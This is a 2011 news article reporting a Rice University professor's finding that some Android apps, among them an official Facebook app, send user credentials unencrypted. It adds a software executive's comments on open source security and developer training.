Top 5 Stories


Google Android apps send credentials in the clear

01 March 2011

The Google Android smartphone platform has come under fire for a lack of security in certain apps, including an 'official' Facebook application that transmits certain user credentials in the clear.

This, says Professor Dan Wallach, a computer science professor at Rice University in the US, means that anyone using a WiFi sniffer application can eavesdrop and possibly intercept user sessions on a variety of web portals.

Wallach also asserts that the lack of security – with the exception of the password on Facebook – could allow a user's online session to be hijacked.

According to Phil Lieberman, CEO of Lieberman Software, the professor's discovery is typical of open source software, as there is little incentive for the software developer to use secure protocols unless the destination system requires it.

And this, he explained, is the biggest issue with open source software.

"Whilst the economic imperative to go open source is clearly very strong, companies that use open source, such as Android, which is based on Linux code, also need to ensure their software is robust on the security front, and this process costs money", he explained.

Lieberman, whose company specialises in privileged identity management and security solutions, went on to say that Android apps are an interesting case as, unlike most open source software, the apps are usually designed to run on as as-is basis, so adding security to the IP transmission side is not always as easy task.

"I would go one step further and state that this disclosure is but, one early warning shot about the use of cloud computing and new platforms such as Android and Windows Mobile 7", he said.

"The other element is the stark reality that computer science graduates rarely, if ever, receive any training on how to write secure applications. So it should come as no surprise that many applications created by these same people are insecure", he added.

Lieberman went on to say that, depending on the platform provided by a vendor, the core security available to the developer can also be woefully inadequate.

"As a consequence, developers of applications frequently find themselves needing to add layer upon layer of additional technology which may beyond their expertise and budget", he said.

"Because security is frequently an 'out of sight, out of mind' problem, it does not get addressed/funded until someone complains or something bad happens", he added.

Lieberman concludes that Wallach’s findings are a great lesson that it is time for developers to hit the books on how to secure their applications.

"Platform vendors need to complete their security and encryption suites to make it easy for developers to write secure applications", he said.

This article is featured in:
Wireless and Mobile Security


Comment on this article

You must be registered and logged in to leave a comment about this article.

We use cookies to operate this website and to improve its usability. Full details of what cookies are, why we use them and how you can manage them can be found by reading our Privacy & Cookies page. Please note that by using this site you are consenting to the use of cookies. ×